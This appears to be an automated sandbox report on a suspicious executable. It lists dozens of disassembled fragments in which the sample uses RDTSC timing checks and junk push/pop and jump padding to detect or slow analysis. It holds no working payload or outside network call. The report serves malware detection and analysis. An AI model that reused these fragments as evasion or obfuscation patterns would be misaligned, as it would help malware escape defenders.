    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15241BB second address: 15241DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007F29FC518E96h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F29FC518EA0h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1525F55 second address: 1525FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov dword ptr [esp], eax 0x0000000b mov di, 56E2h 0x0000000f push 00000000h 0x00000011 mov bx, 6E00h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007F29FC4F3698h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 pushad 0x00000032 push eax 0x00000033 add dword ptr [ebp+122D35CCh], eax 0x00000039 pop eax 0x0000003a mov dword ptr [ebp+122D2106h], ecx 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jc 00007F29FC4F3696h 0x0000004b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 152617F second address: 1526196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518EA2h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15270C6 second address: 1527155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC4F36A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F29FC4F3698h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 xor dword ptr [ebp+122D22E6h], edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebp 0x00000031 call 00007F29FC4F3698h 0x00000036 pop ebp 0x00000037 mov dword ptr [esp+04h], ebp 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc ebp 0x00000044 push ebp 0x00000045 ret 0x00000046 pop ebp 0x00000047 ret 0x00000048 movzx edi, dx 0x0000004b push 00000000h 0x0000004d mov dword ptr [ebp+1244ED10h], esi 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 jno 00007F29FC4F36ADh 0x0000005c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1527155 second address: 1527168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518E9Fh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1526196 second address: 15261A9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnl 00007F29FC4F36A4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15261A9 second address: 15261AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1527168 second address: 1527179 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F29FC4F3696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14C0D3C second address: 14C0D53 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F29FC518E96h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 152EB5D second address: 152EB63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 152EB63 second address: 152EB94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F29FC518EA2h 0x0000000c jmp 00007F29FC518E9Ch 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 jc 00007F29FC518E96h 0x0000001c pop edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 152EB94 second address: 152EB99 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1533E97 second address: 1533EA5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29FC518E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1533EA5 second address: 1533EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153B60E second address: 153B612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14BA230 second address: 14BA241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC4F369Dh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14BA241 second address: 14BA267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F29FC518EA0h 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F29FC518E9Ah 0x00000015 popad 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153A26D second address: 153A27F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F29FC4F369Ch 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153A27F second address: 153A28B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F29FC518E96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153A28B second address: 153A28F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153A8C2 second address: 153A8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518EA8h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153ABDB second address: 153ABE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153ABE3 second address: 153ABE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153ABE9 second address: 153AC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC4F36A6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153AED2 second address: 153AEFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518EA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F29FC518E98h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153AEFA second address: 153AF04 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29FC4F3696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153B054 second address: 153B058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153B058 second address: 153B079 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F29FC4F3696h 0x0000000d jmp 00007F29FC4F36A2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153B079 second address: 153B07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153B1E4 second address: 153B20C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pushad 0x00000009 jmp 00007F29FC4F36A7h 0x0000000e jnc 00007F29FC4F3696h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153B20C second address: 153B247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F29FC518E96h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F29FC518EA9h 0x00000017 popad 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b jmp 00007F29FC518E9Bh 0x00000020 popad 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14C5C57 second address: 14C5C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153F96B second address: 153F995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518E9Ah 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F29FC518EA1h 0x00000013 js 00007F29FC518E96h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153F995 second address: 153F99B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153F99B second address: 153F9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 153F9A5 second address: 153F9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14D3105 second address: 14D3109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14D3109 second address: 14D3120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F29FC4F369Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15466C9 second address: 15466E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518EA8h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15466E6 second address: 15466F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F29FC4F3696h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15466F0 second address: 1546705 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F29FC518E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007F29FC518E96h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1546705 second address: 154671D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jl 00007F29FC4F36A2h 0x00000010 jnl 00007F29FC4F3696h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14C4217 second address: 14C421D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14C421D second address: 14C423E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jo 00007F29FC4F3696h 0x0000000c jmp 00007F29FC4F36A4h 0x00000011 pop edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545244 second address: 1545263 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F29FC518EAAh 0x00000008 jmp 00007F29FC518EA4h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15453F6 second address: 154541A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC4F369Eh 0x00000009 jmp 00007F29FC4F36A2h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545572 second address: 154557C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15459A2 second address: 15459BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC4F36A7h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545F7A second address: 1545F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518EA4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545F92 second address: 1545F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545F96 second address: 1545F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545F9C second address: 1545FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F29FC4F3696h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545FAC second address: 1545FB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545FB0 second address: 1545FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1545FB6 second address: 1545FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15460FB second address: 154611B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC4F36A8h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 154611B second address: 154611F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14EF684 second address: 14EF69E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F29FC4F3696h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F29FC4F369Eh 0x00000012 jo 00007F29FC4F3696h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14EF69E second address: 14EF6B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518E9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jc 00007F29FC518E9Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 14EF6B5 second address: 14EF6D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007F29FC4F3696h 0x0000000b jmp 00007F29FC4F36A7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1544DF7 second address: 1544E1C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F29FC518EADh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 1549FA3 second address: 1549FC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 jmp 00007F29FC4F36A7h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15AA638 second address: 15AA642 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29FC518E96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15AA642 second address: 15AA64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15AA64E second address: 15AA652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15ACAA5 second address: 15ACAA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15ACAA9 second address: 15ACAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15ACAAF second address: 15ACABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F29FC4F3696h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B263F second address: 15B2644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B2A54 second address: 15B2A58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B2A58 second address: 15B2A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518EA7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B2A75 second address: 15B2A80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F29FC4F3696h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B2BDB second address: 15B2BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B2BE0 second address: 15B2BF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC4F36A0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B2EC3 second address: 15B2EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B2EC9 second address: 15B2ED7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F29FC4F3696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B616E second address: 15B6174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B6174 second address: 15B6178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B6178 second address: 15B617C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B617C second address: 15B619E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F29FC4F36A0h 0x00000011 jmp 00007F29FC4F369Ah 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B619E second address: 15B61A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15B8715 second address: 15B8724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jbe 00007F29FC4F369Ah 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15BB362 second address: 15BB368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15BB368 second address: 15BB373 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15FC376 second address: 15FC3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518EA6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jnc 00007F29FC518E96h 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007F29FC518EA8h 0x00000018 pop ebx 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F29FC518E9Bh 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15FC3C5 second address: 15FC3C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15FC3C9 second address: 15FC3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15F9399 second address: 15F939F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15F939F second address: 15F93DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518EA6h 0x00000009 popad 0x0000000a jmp 00007F29FC518EA9h 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F29FC518E96h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 15F93DD second address: 15F93E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 160B4AB second address: 160B4B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
